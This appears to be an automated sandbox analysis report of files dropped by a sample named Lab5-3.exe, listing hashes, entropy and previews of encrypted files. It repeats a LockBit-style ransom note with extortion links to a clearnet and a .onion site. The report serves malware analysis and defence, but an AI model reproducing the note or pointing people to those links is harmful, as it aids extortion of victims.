                                                                                                          Preview:8.c.@.lS......0....#p.;..c..O^...)........|".R...p..t..Yw.......[.6..d..%.D..h...YRZi..\.U..g.{.....a`4G`.._.|5.H.c.#3..Y.jB..3g.b..X.+...R..H.@.vq...q...O.........Sn.C?_.....E.._..=...&..2)....\...j0...(2...h3....<..A..7...K.A..+5....'....~.5..8.[..IJ...!......)..X.)W..(-..y|g.....xt.n.Du..(.._...h9.......z....z......e..}..9"f...\L...x.*..1G0&.#P.Q.......Cb..H!9..1...G4..xI.nQ.5.-.l+......v....3C.Z..]%.=.R.7.|8.Zl.j.b.Id.la.3.,.k.}.c..#.......T.&.5..#*...Bl.%...q..g+....sa.s.m..J...}..-K*....GZ...C..ki......Z1...W.......w.d.....w..\. .............k...........j8....|r...6D..c....X.(......*.N....%......).o....G.~.....a.....B.qaK..7>..lt...m..X....S....Z.'.....a..8.;..a...Y.~^....K.ch.D%...S$.Jf.U..B.z..Z.....G)^.\[.aq.....L.{......2x...*.S..'..MCi.m..(........Q....tP|...-....d7u.g..|..s[..I..J\....s......Gn.cu_S.^I..5.q.m.6.....%.Y..Y{..,..r.Ni...o.(.H.N...f.g.D..yij6.4..r.,>...K..=..y!..i0L`...q.]D...Pijg.Y|.B...a7vihp..j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10832
                                                                                                          Entropy (8bit):7.982420634843925
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:XmGPHKX65hyPSiv2Z14w7a93c93yPbkUQrTTl43MO80Cb:X5KXKhm81b7+IyPbkUQnKcO8tb
                                                                                                          MD5:74D79E40059F5078E731A6A08CB4C27E
                                                                                                          SHA1:B5722D0FD77051F2F0F268FDD92FBBFC19685C36
                                                                                                          SHA-256:BCCAF8B3BDC944BD699D760163174E0BF4F053B1BF74038E6E948EFE351546C3
                                                                                                          SHA-512:E7FE82232EB29BAF1BCCD03FF7D46D08F336EE79A39CD1FA0A06D5CE1BDD7482B78F2C0A4F32795E789210CC38965B8230712EACD9683BCC6F7269BF7B2C924A
                                                                                                          Malicious:false
                                                                                                          Preview:..Y....%..............C.+..2. ......%J..i.f..R...j.th.8.kX ..i....m....]g.../.IfB..X..5...B.w......i..L......j.B...IdN"rv.]'....6......5...m.nV./..$&..xS.3..#...t.;.$p...?.U.Qw.....c.|....Y...............q.i.(.+...B5....../.CL.=....X.y..I{...w...{..o.()/.Cf.R....mb.......I.. .3..q.+.v ..x4W.5-l>.)a#.Z...s.>....=...+.... .*.2...B....Y.Yn....T ....r...\.t.$...D~.7...h.......<:a/O..E.;....h..D..6......d.)..m..../..?.....|.V. U...4.5....Sj)...Z.7...N.4...:_.a..t.] m....>x.5..W_.'.....S....q.#.w.9.+-..?f)..a}.}.....:..i.^....5.w......$.j...vL.(.x...Q....V.}..2....1.i.r.4.=.G.}L.#.T.xPM_w[8..I...(. ..YPt....I.#(....(B..4.k.k .Q.Vw...~..../.........s........ub...f|......^......... ..~..^.w..GXx. .....G..U.!.N...}vo.xB.X.@.....o..:`......R....y*.H....3.h..u..J7.x8r6.^...c..u.j....".MG..JC/.ZB..:Vl^V.r.x.h..z..\...T..v..L.ar.l.S.R%/b..$...1.C... .........)*.\.2..K.......B.....Y.....Y.?i.J.87..5{..JE.`[!.4...<.*. .[..<.`.H.......,......[c5...D5..!d
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12416
                                                                                                          Entropy (8bit):7.985102325337798
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:7VkY/OX3vvzmZw9vtyFGI96uUeWzLJXlOTP2j2aVlh8F6NayTO4Zeo0Cb:h0X3v7S6yFGIQWsJkTC2aVtNhT3Dtb
                                                                                                          MD5:4B177C713632ED421931AD99FAE8C5D5
                                                                                                          SHA1:CDD6D029F21FCA873F6098BD1CCC938DF34F7C0C
                                                                                                          SHA-256:731AAEF3C1F13AA303BE7EA8FD937217C43BD5806C54994178F5E222B793C5A0
                                                                                                          SHA-512:77830156A3F5FAF1ADE05309B90B15071E77F7A9B103D9181281BCB6E50946D26B9C8A65C7389FE17B48E3BE51862461DBCC4C686AAF4B987E464C24E1F815D9
                                                                                                          Malicious:false
                                                                                                          Preview:.k......P...<l..,....r..j*..w.b*..1h... ..w.f.C..I..]..X..N.;.X.V...7w:......4.....^v.D.h......n>...>/...>..>....z..0l.?.....~l.[.9.D.F.I.@...w..'{.7..f.......E .~.<..y......w{....".....`.wLl..P:|Q......Yx....S.J.....p?....L..S_!..jb.iH30..$.i...../gN.b5&~.4.3....?.z..Q.l..=i./.z3...z.1...!k...-.&..,. >..N#f....2V..g.P..Q.r/..C.|.R...R.JYY\....).+O>...J..w...`J.....~.\....h]F..X..H./2T..NA{.5...j^;..U....... .(.1.....x..,?F5Xws@....m".v.B.......Lmk'5...7mM.D9UcA.o.7de(tO.CV..b;....X.es.{M.....80).>Rf...$H.bZ...:.|....+.+ .Yi....0.Y............i;.W...At.-...Q.,.*..{;W...$K.!;R....\.f.....7f.tm.Y....!..y....u..wm....c.\j.cNs..V...S...9]d.=....9..y...`.^.@..B...&.pAb..t....1.gW..&..&.-..L.^#n0...Sc..r8..j<|Pu3...~.@.....c...r.(.L.R...]..!...+B..D.g>..2...8...z...........UR:.v...5g.(4.S...MS..Oj..kU.....Hsc5...>.~?..hcr(C_..8V...U.*4........z..v...|.|.......'di{.C...l.,RJ..a[...oO......,...q1......^........4...]7...*S.]*>.l].........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11024
                                                                                                          Entropy (8bit):7.984506527252434
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:RVdiJLkjZL6J3yo6BXz1we2B8I5+BcHx9yF/dC7H1WyQJkrqP0Cb:R/ixkjB239gI5ECx9sdCzmOrotb
                                                                                                          MD5:A399E049022594DC329E9D893E888F23
                                                                                                          SHA1:E7A29E7E1BAA5D52C97744363038189F769FCE9F
                                                                                                          SHA-256:F1DAD0C974B29D0F8E8B19F726A45B48A66F668D6DA706A3AD214533BA4D9E6B
                                                                                                          SHA-512:7940D1BC7DC4A16C14B4C70E2841DABB0A7191CBE3E16690373EE3C0A42771F022CDE566211883F799C11C02817BFC342B80839227EFD946DC5369208675F24C
                                                                                                          Malicious:false
                                                                                                          Preview:..[...R..?@.x..M..O....f.SH."....LX..`...z<.8.K..f.|w^......-.t...lXk.C......%&..e..L`.]._>@]lI..l..jb..^.YG27p..H?...I..m..f...L.u.0c8.=clE.;a9.r<......*;...w.D.].>...-.(H..ee.....B...f.....!P.=n.w..`.!.~../.Y."1..=.............;.v....3.......H).n|..{.K{(..k.}..]...#J.X..x3.o.n..}.-.h.....{.Q.M..X[..Gq.v. k. D...w)'.j..k..N..>:.(.f..W.~n..y.T.H.y.#.G........E.)k,7..A%b.B>p....+.:9...=...m.v...d[U.&.l...&..Z`.,.`.....E.&ZQ....ToE.".;R.59=l./..>w......IK<..(...........67...s.<.<.0....W..ri.uQ.E..^g....I..Cz...P.....k._..e.......L.\m.G.:..w<...B...B....$....f..........u...w.\k..2*m..PtT.C..-c...1...qt...Z....Y.;.r.....:...o.-8~...k......h.FP'..5~l(%........Q..4#.RY*K..4$........d.%.g.S[.X......g..-..U\....v.....;...{.6)....o.'..-..Q.~,..Y.'.a.s......./.....w.9..... .+T.......@l.5..T.a.C..a...B.m..r#."....>W.Me.i]..O......s.....iZ@4.Q.Mv....Xs.IN_....qR.3...g..u.\......,zl....f3.b.Q.E...O..N..I.....i....)..e.. ...Fd)..U.b.(..N.~}.w...<..?
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10176
                                                                                                          Entropy (8bit):7.98153605068539
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:XZtFlrTc1UlUH5fgITcwrxYwHdGmVMoY/ZSBhIrC0Cb:XZa1UlUHNgITcw9HdGmSRmtb
                                                                                                          MD5:67F1D1B31E87D246F563D987601F846B
                                                                                                          SHA1:5CD2CE53C1B31195964D2435EBB76503CA714E72
                                                                                                          SHA-256:6906A43620E493E8A67BBA0AB7C1F508531A44B3BA4504929C25CFB43E1F290F
                                                                                                          SHA-512:C4EFC796DCA7C892C15B897181DF2D9994B4E778AF99BD97D005F8851DA80A575034E13865C0EAB10EEC29D7CBE01360572184FCB58E0D0F4BFA5B67349BB772
                                                                                                          Malicious:false
                                                                                                          Preview:.o^!;....N.$..~"".Bb....L.@...Ie...z.'.$.>L!.G|..[sd)$.<...%3o.@.J..:.O...NQ....3yO..m.y.9l.=.4..rl.\.L8...m...D..V..Q.X.G..o..p...(.EV..2...;..PC.8.B0...~..7cJ..eD4..E....... +.8... ....z.I.F.!............B..B.>...4...tyZ..B!..p<.?uO1..d.E6...[...+nV..,...' ...E....W..q..C...S...F.K1;.=f}..Q}..{rv5.n1..w....>..-.d.j....x.1.{.....B.y,...S.f<j..4C.......n....Y@......"R.N......@I.z....."._...Tp..).L......d+NQ.t.z.".j/........)..7..b.._.....@....ahS^.....av...9...U*.vD.F*J......*../.<.{..w.jP...n.5..;i.C...uk.........^.s...z|S...;.V...G...B..].P.H...QC..v).j..c..1.s.........sM.R.5B{L.F..m0.f..'.....wi..:.H.. =X[..=..*y....G.M..=...!?.A.S.....>`.z...O...@X.8z._&.b..m....{...1]..&?I...@..A..Zd.r..BD.M..?......m7.m......7..........&....hE........].>S...5uFeN.&.&......H"g....K?.>K..B....+...%.o-..,.).!^@6..VK...2.@.....w.{.=-Y.tt.i.!<_.5...."A.Q).G.p.rl.....|%P...c:!..d}=.e.7.k...$.>7Yw..2!.....d[cP.+..9.a....l...Z.;.[.$F^.b....Z.2.c*....XS
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10864
                                                                                                          Entropy (8bit):7.984041900771494
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:6ZB/LwzilZs0jTmzYojlg+E5c1MypTbTIkLIQkU8EiSH0Cb:qRLwziL3MuaMKbTIkLiBitb
                                                                                                          MD5:01E205CF3C35F408D2B9FB12C2CAEABE
                                                                                                          SHA1:77B10B1BE8E398D0DE3A891EA86B64F61CF35531
                                                                                                          SHA-256:BAB49E426C74963988CC3DCDD2EE4F9368B77C8B04601F25D63F9459E76602DA
                                                                                                          SHA-512:41862BE9A13F644102940A1298B432CA6D4BAE0664CAF219A98F7C41BA0A0AC24FB8F80E375944DCF60821F29AFE4D66B8ACBA6E3464F7B62747F54BF7D7067E
                                                                                                          Malicious:false
                                                                                                          Preview:c.=.3ZExQ.6..~u6.R=....c>'.=......D........~...@;..Xa."S...U....F...&.+g...=1..f....e[s!V.H.P..b........+.^.ie..I;;;..."{.y.|..'.F..E....3.#R.,w....>>....k.$.o...s=.OYMz.a....D.........8<j8........+....PD.L.W.d$*.n...5(l.t.aV@E.yXq-qO..T-.F@b...q...v9o..#7!.F....tF...M...[.F.....g..E>...R<.68...'..&_..M.u.q......ib.\....F.U.<.(Wnj.v(.....7..0........)i..d..5.|.s5a......(^.({..]c....Hy....X.H..j....Xc}(K..k.a...a..?...u...LS"..>...m.M........B.S.kN.w/xj.....)Sb....1:1T....zd.9.../..*%@.M......v.....f...{%..s.#.g.WZz....Me..@......K.....r.C...E?.B..L.I.l..oDELYt..n..u.]....;...}|...........)7..ZB.,...G.,.4.%......*.p2..q....p.B......[>v."....r!t.@(./...F.B..{.$2O.~.<rI5=......2.6.c. T.....3Z..s..=..3...!..$.z>.:..|Z-;.R.y.. ..3...HnF.S(...0.-#...,...._...k.!@...o.P.Q.F*...j.R]hh........"..!.h.cy.v...<.a...9A..,.E.u)A~$[N....v..J...PG^:.c.5.}...0\P.6;x..Y.i......\........h....F.Z..A..3C....y\....u...`.z.E]...Vl.....se.M.....LH.>..,.E....[pe5>"..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10944
                                                                                                          Entropy (8bit):7.984629700350514
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:N8YXXKiEKM1K5H/BljziJ+l0+IF6S4mGx5YyyVNTM1uuCnX5x30Cb:DKbKM1+/bpIF6Q6yVpM1uuQx3tb
                                                                                                          MD5:02359428A323B02DC39BE15646CEA17C
                                                                                                          SHA1:B9C10A4DF033F3962A0F840C63664A48D3732029
                                                                                                          SHA-256:1091D46751B4C6079CE86B2619619FC36462DB9E799346DC37D0087094FF6A1C
                                                                                                          SHA-512:B29F0C2EC3925BA4D89E64BAC30C00C2DD93BABBF960DBEE8D56588A90C1676AD558CFD456465EECD133C093882F78973D6A204DBACA5F327D13846EF78F156F
                                                                                                          Malicious:false
                                                                                                          Preview:.u....0.......F.....zU..B...N...(.S....4H.`.tF.t6..k..0 ..+...K.jE/..nn..wM.....f..a....hN..d.o....J..y.O...N..4V?.B.qk4.oK....{E0.-.gLe.T.....v.8..t.J.8+..}....#..;.....c...Q.1....h.U6.......~..CM....}~..PP,?.W"...U...!..?'[i..>...'.'VX........y .A.B.Zk..=.5.J..|.W|B.....pq.;.S..wg9+<.:..$..*..gT..T.&hlo...?.....N...p.r...-.T.k...YD:E.K.....h......$.}.:8.O..xp.L......v.....s....4.rX..i{..)*!.......WM.....;....y.W?.!Z.CAg,......(..pwr."o.4n).....>......UyFu.?+eS.....C.x.....K.BL.. ..=...bp.$f..2..@...M..]......CI...w..yy'..]./#..=.Wv..6KGu...0...E.K.=.7.z.'.j;..X..o$..u....'.%_`..b.....#..(2.Xq.e.W_.!..1....x...Oo.D..+.C\7>.#.iZ..6... ......PB..l.I.C..G...~....=..]..-N.:....z.R...m...>y:.].Z.).(.p.... .`..%...e$mC......`|......M...k..{r.V.*3WNqH..s...(&y..|...A.......Z..A.M...8..n_..r$..[x.. ........x._.......7[c hN._.oYL...C........`O....6n.[...NL...y..H..d.lqb......h.5../.......h..........q....^..y...rR.*....w......I.X....CgQH\...M-m};.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10944
                                                                                                          Entropy (8bit):7.9855888491204645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:fDxdqD7b6lN/Ay1nTTkW2H89H+mT1bZrNXmS1zB4LXTEEfHTm1LlCS0Cb:rxUX2Lf1TTkWf9H+mDrNDzB4b1fzmftb
                                                                                                          MD5:E86C7C7D91FEB30EF849EEC2A3D65A90
                                                                                                          SHA1:281CCA7B07A58134521A57F81676529101F61B7B
                                                                                                          SHA-256:237626F52E9F28663FFFADCC90C685C3C30E232B73C9B274315C647D7236C33A
                                                                                                          SHA-512:518450E3325B6EB613F196A68C07D015B920E3F541DBD3FC4B2F5C77A319A8B94076895E2376578232974A9276B1900DAB733CF1860DC445FE4AEE556C590C87
                                                                                                          Malicious:false
                                                                                                          Preview:...Y....3.Lf....s.B.>.b.L.;mi.H.R&....%es......../.e...R.sPu...X..bA.JI......Z...%.(.<......)].N2....7AZ.z.F}.i.Qk...|<#..g...CO.u.K......1.Y.....%..@.d..d.0.....}.m.3...N .3V_..o_...........l...O..mp.o...)..U........6......D.L..j...S.._.n.n.A....RY..y..}.Z`/l<.#i.I.Sr..d........H.Te.v..........).o..O.a0.5./..*......|.;E!...k]{a>.|..-`U..9.o.7L[n..6.8...7....3...9....k.@gv.V...E\^.#.Q3...x.|m6e...r..vpm...+.0.nd..c.6Z...G.K..j..`..y?....a.Wu..SAz..~.\....0 .=..[-ku.2../. .i%LR9.....|...X.#......lv..F..:..\.4.<..lc0...x.u.R.6.....x.....p.,....~......NX....5t...,.gM...........z.......:..`A....i....R-#....J9).)..R....Y..~.:k...nS...u.=C.:..m..-.2.q.....]...tN5.j?..{?..?.;B.J....*..#......5F.b..xO.RV.o..'[.,...(..,.o.S.. .X..-.|`~....tq.*...Hj..*?d.f.*....E.a*.....B..[...m..(...e.......Z+?.9..r.=.}...L.iv.w.f.O..K..h.<`Z....m{.>.kc."...U.H...f..>."....Cz.k..M...v..&./i..u.t=55h.h..j..#k.b=."........X.W..aFT.Y......;..NV.e!.U.....D......Y.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
